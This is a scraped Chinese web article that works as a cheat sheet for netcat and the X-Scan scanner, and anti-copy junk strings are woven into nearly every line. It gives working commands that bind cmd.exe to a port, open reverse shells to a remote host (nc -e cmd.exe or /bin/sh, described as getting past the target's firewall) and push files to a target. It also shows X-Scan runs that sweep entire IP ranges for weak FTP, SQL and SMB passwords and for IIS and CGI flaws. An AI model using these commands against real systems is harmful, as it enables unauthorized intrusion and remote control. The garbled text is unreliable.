你的位置:pcMing工作室 >> 资讯 >> windows >> windows应用 >> 详细内容 在线投稿

系统外部命令(均需下载相关工具)

排行榜 收藏 打印 发给朋友 举报 来源: 互联网   发布者:未知
热度903票  浏览240次 【共0条评论】【我要评论 时间:2010年2月09日 23:33

+O5a'~5Gv`.P'h01、瑞士军刀:nc.exepcMing工作室de MV`D

l#Ctb'g6h.A/L0pcMing工作室;c#s6]%m}4T1V

T#@ yO~^0参数说明:
a]j9A+l3@i0pcMing工作室~}XYu'g
-h 查看帮助信息
#jpL+~5gN0pcMing工作室+D"n.[-z8v.@
-d 后台模式
Iaz!S+P!y(h+tVG(P0
2a|1s!T`Du*kAHP7Q!@0-e prog程序重定向,一但连接就执行[危险]
y4k1qw+Jp0pcMing工作室'v"h-e9bqrN${+`0Y8tK h.X
-i secs延时的间隔
4u4v u_MPn S0
i)q3x#N.Z(}zZ[ U }0-l 监听模式,用于入站连接
xh,M$j)qz UH,x0pcMing工作室ve Z&s6z i^3tOw?
-L 监听模式,连接天闭后仍然继续监听,直到CTR+CpcMing工作室{$TOE!GF#w _'H]
pcMing工作室+dA5}.p+I$rv/m%s4K
-n IP地址,不能用域名pcMing工作室J e)RNR/q{

?F!q!P,yl Bu0-o film记录16进制的传输
qm n`4cp/f'K0pcMing工作室 Stv)t J_VBh#] Q
-p[空格]端口 本地端口号pcMing工作室om}Kb

z'hT~&aC r1] r ]0-r 随机本地及远程端口pcMing工作室o3}3^m}X$@

*h5xT;dtq0|0-t 使用Telnet交互方式
"H![^K!F_$M5D0
V3Oa[N4w [0-u UDP模式pcMing工作室,b/j/zBJt;r0n

.b1W7X{f`:B~FQ0-v 详细输出,用-vv将更详细
hL7kp|H:E0
|~k/b`r5n0-w数字 timeout延时间隔pcMing工作室,Wl0` bnfd
pcMing工作室9E;S GQUX ol1fH|
-z 将输入,输出关掉(用于扫锚时)pcMing工作室"V]ul;un n)k

p&T%_-A ~Fy%~zA0基本用法:pcMing工作室ro U(D+Sg/lLq
pcMing工作室e+[y3}%IobH_E
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
/ZJ?k%K|d$y0pcMing工作室xE/],jq#O5Zn'v
nc -l -p 80 开启本机的TCP 80端口并监听pcMing工作室#@+bO?6XM4A#}
pcMing工作室.Qp*tMq My
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口pcMing工作室a#B#PjBaN}[X
pcMing工作室!QS,z,?0v|
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
8m"o.{Z5X.s5z'q0pcMing工作室rIh#yd!?YL)Z!T
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
ef$hfW.x1y'Je-t%R0pcMing工作室G@l$|fL-a
高级用法:pcMing工作室_kG!t$N&Z)b U
pcMing工作室Db,Niow FMe
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止pcMing工作室9bM$Im:[\yMmx
pcMing工作室/md~"xl)_9oB Kb
nc -L -p 80 > c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:\log.txt
!t@ N.t.C Vwtl0
8J`h4q b8Wu x[0nc -L -p 80 < c:\honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
c\'q8e,c0
nZpY Y [)p3k*{T0type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用pcMing工作室2`#D c&lf
pcMing工作室$Q~,@ \!@i2~
本机上用:nc -l -p 本机端口
c+Hh#qja0
q C`o7R3F0在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
9[JS_9b5S g?0
?"\;za2MVz,~ T&Z^0nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
&R:J7ge1K s$A9T.V0
T-b+I4{A(J0本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称pcMing工作室-\ r;l~ z

`P1[v,]0在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
rO:K;HFhf%Y*p0
hcL5W+v%{0备 注:pcMing工作室&N-}f|spE1Md

l:KE%Ds)K.I V0| 管道命令pcMing工作室\Qh4Db8d g

3M*jkl&v"H5Y0< 或 > 重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令
nN0NA5lo]X3h%]0pcMing工作室'e p`U9uy
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt >> d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中pcMing工作室qkiZ`kg hU3u

E!dF E t0>与>>的区别  ">"指:覆盖;">>"指:保存到(添加到)。pcMing工作室/O G:dG\2BaN
pcMing工作室 A \KDgcu
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。pcMing工作室O m/T7@B.G%jZ2U

pcMing工作室`e*{7V!atFZz

2、扫锚工具:xscan.exe
(gs!n+R8\DP0pcMing工作室)} } RU O(Ig
pcMing工作室(IU w lW*m/|;v5n2P7x
pcMing工作室g{ I#r q(y2LB
基本格式pcMing工作室1D6?0xPI.Z.m!Y+h rU
pcMing工作室1A,V~2~&CCv
xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息pcMing工作室B[ ^,\1O U

A]\ e6Z(f0xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息pcMing工作室C Yd)t BF3_

U#iQn.[/}7iK&G0检测项目pcMing工作室M%d.Ju9n|8no#V
pcMing工作室u;i9J)~;j&e'mtm F
-active 检测主机是否存活pcMing工作室5G Z8Y6Pi/b

y u"~vO,F2M\+W+Vp0-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
CyHP*z.O0
Xv5ps0[-V_0-port 检测常用服务的端口状态pcMing工作室1O.F8C+wY;F7~y'p P4j
pcMing工作室 L$G$o)x QN?*S6d
-ftp 检测FTP弱口令
G+vu1fu2t.OP0
,T/q5~r,R.e8A\v0-pub 检测FTP服务匿名用户写权限pcMing工作室&RuzQ Q0F2eU Y#s^s
pcMing工作室"?n G?/Q4S]R U
-pop3 检测POP3-Server弱口令
R i(Qe O3z4xu8Qa0pcMing工作室G4P M\*O5a
-smtp 检测SMTP-Server漏洞pcMing工作室5i'ETC2M&Jf0r4h:{R#N

q&c)Jb_(UI&B h2MYB0-sql 检测SQL-Server弱口令
t/_'r]ff6TD0
rum6lZ5Y$XM4i${0-smb 检测NT-Server弱口令pcMing工作室p j3Y \B"U
pcMing工作室(rZ.p;n$S
-iis 检测IIS编码/解码漏洞
F1E:Jla ika%W"H:L0pcMing工作室;y]a6UPdy
-cgi 检测CGI漏洞
,u(ank"j;vSs#Kt{0pcMing工作室FyAm;E
-nasl 加载Nessus攻击脚本pcMing工作室VA lqGMV w

$d;o$AK-v-S'V'R6bf0-all 检测以上所有项目pcMing工作室-GI2wBtF E9E

!E`.K#]6J ^zp$T0其它选项
*n'T%GX#Oc0
,io&i[F,[ Cd0-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取
$_? p8yi6Jg `0
TT&JQu"R4ms0-l 显示所有网络适配器
D5h'o S@0
T2lyM'x0-v 显示详细扫描进度
'\ O#jrcp?0pcMing工作室0@JM_CXq
-p 跳过没有响应的主机
"m(s a2Y$I/`7yMf0pcMing工作室 ~4D6F)E9Ox
-o 跳过没有检测到开放端口的主机
QgO7L%@ p0UU0
xfa6}?{0  -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10
,UZ J%T3| LgA0pcMing工作室/n|5O1h&sug[
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)
lD{u#^7rtxKHp0pcMing工作室/pq@5E^X
用法示例pcMing工作室%rr!? }u"Tj
pcMing工作室'K3h/\ ?s9]cEJk_'O
xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机pcMing工作室)J;EMo`F'Q+p

*hHIk0~'r!J,cZx(r0xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机pcMing工作室+UY!Y'C4i:y:R
pcMing工作室6`gW+i6["r(B
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机pcMing工作室3w3i/L)C:I2S&KB!D

pcMing工作室9Zu;fF,p5_)]

顶:48 踩:47
对本文中的事件或人物打分:
当前平均分:-0.21 (294次打分)
对本篇资讯内容的质量打分:
当前平均分:0.18 (267次打分)
【已经有247人表态】
31票
感动
27票
路过
37票
高兴
29票
难过
37票
搞笑
23票
愤怒
36票
无聊
27票
同情
上一篇 下一篇
发表评论
换一张

网友评论仅供网友表达个人看法,并不表明本网同意其观点或证实其描述。

查看全部回复【已有0位网友发表了看法】

网络资源